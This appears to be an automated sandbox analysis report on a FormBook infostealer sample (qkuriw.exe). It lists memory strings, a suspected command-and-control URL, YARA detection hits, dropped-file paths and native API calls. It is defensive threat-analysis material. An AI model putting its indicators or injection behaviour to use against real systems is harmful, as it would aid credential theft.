            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000001.00000000.1293534027.0000000007B03000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: mstsc.exe, 00000004.00000002.1549448935.00000000056A9000.00000004.00000001.sdmpString found in binary or memory: http://www.regulars6.com
            Source: mstsc.exe, 00000004.00000002.1549448935.00000000056A9000.00000004.00000001.sdmpString found in binary or memory: http://www.regulars6.com/aq3x/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: qkuriw.exe, type: SAMPLE
            Source: Yara matchFile source: 00000000.00000002.1325323347.0000000001221000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1542898983.0000000003050000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543067846.0000000003291000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000000.1277150451.0000000001221000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1325998412.0000000001560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1325803353.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543143849.0000000003470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543182112.00000000034A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0.2.qkuriw.exe.1220000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.qkuriw.exe.1220000.0.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Detected FormBook malwareShow sources
            Source: C:\Windows\SysWOW64\mstsc.exeDropped file: C:\Users\user\AppData\Roaming\K3-3TQ7V\K3-logri.iniJump to dropped file
            Source: C:\Windows\SysWOW64\mstsc.exeDropped file: C:\Users\user\AppData\Roaming\K3-3TQ7V\K3-logrv.iniJump to dropped file
            Malicious sample detected (through community Yara rule)Show sources
            Source: qkuriw.exe, type: SAMPLEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: qkuriw.exe, type: SAMPLEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.1325323347.0000000001221000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.1325323347.0000000001221000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.1542898983.0000000003050000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.1542898983.0000000003050000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.1543067846.0000000003291000.00000004.00000020.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.1543067846.0000000003291000.00000004.00000020.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000000.1277150451.0000000001221000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000000.1277150451.0000000001221000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.1325998412.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.1325998412.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.1325803353.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.1325803353.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.1543143849.0000000003470000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.1543143849.0000000003470000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.1543182112.00000000034A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.1543182112.00000000034A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.qkuriw.exe.1220000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.qkuriw.exe.1220000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.0.qkuriw.exe.1220000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.0.qkuriw.exe.1220000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Windows\SysWOW64\mstsc.exeProcess Stats: CPU usage > 98%
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123A190 NtAllocateVirtualMemory,0_2_0123A190
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123A060 NtReadFile,0_2_0123A060
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123A0E0 NtClose,0_2_0123A0E0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01239FB0 NtCreateFile,0_2_01239FB0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123A18A NtAllocateVirtualMemory,0_2_0123A18A
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123A0DA NtClose,0_2_0123A0DA
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01239FAA NtCreateFile,0_2_01239FAA
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA99A0 NtCreateSection,LdrInitializeThunk,0_2_01AA99A0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,0_2_01AA9910
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA98F0 NtReadVirtualMemory,LdrInitializeThunk,0_2_01AA98F0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9860 NtQuerySystemInformation,LdrInitializeThunk,0_2_01AA9860
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9840 NtDelayExecution,LdrInitializeThunk,0_2_01AA9840
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9A20 NtResumeThread,LdrInitializeThunk,0_2_01AA9A20
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9A00 NtProtectVirtualMemory,LdrInitializeThunk,0_2_01AA9A00
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9A50 NtCreateFile,LdrInitializeThunk,0_2_01AA9A50
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA95D0 NtClose,LdrInitializeThunk,0_2_01AA95D0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9540 NtReadFile,LdrInitializeThunk,0_2_01AA9540
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA97A0 NtUnmapViewOfSection,LdrInitializeThunk,0_2_01AA97A0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9780 NtMapViewOfSection,LdrInitializeThunk,0_2_01AA9780
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9710 NtQueryInformationToken,LdrInitializeThunk,0_2_01AA9710
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA96E0 NtFreeVirtualMemory,LdrInitializeThunk,0_2_01AA96E0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9660 NtAllocateVirtualMemory,LdrInitializeThunk,0_2_01AA9660
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA99D0 NtCreateProcessEx,0_2_01AA99D0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9950 NtQueueApcThread,0_2_01AA9950
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA98A0 NtWriteVirtualMemory,0_2_01AA98A0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9820 NtEnumerateKey,0_2_01AA9820
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AAB040 NtSuspendThread,0_2_01AAB040
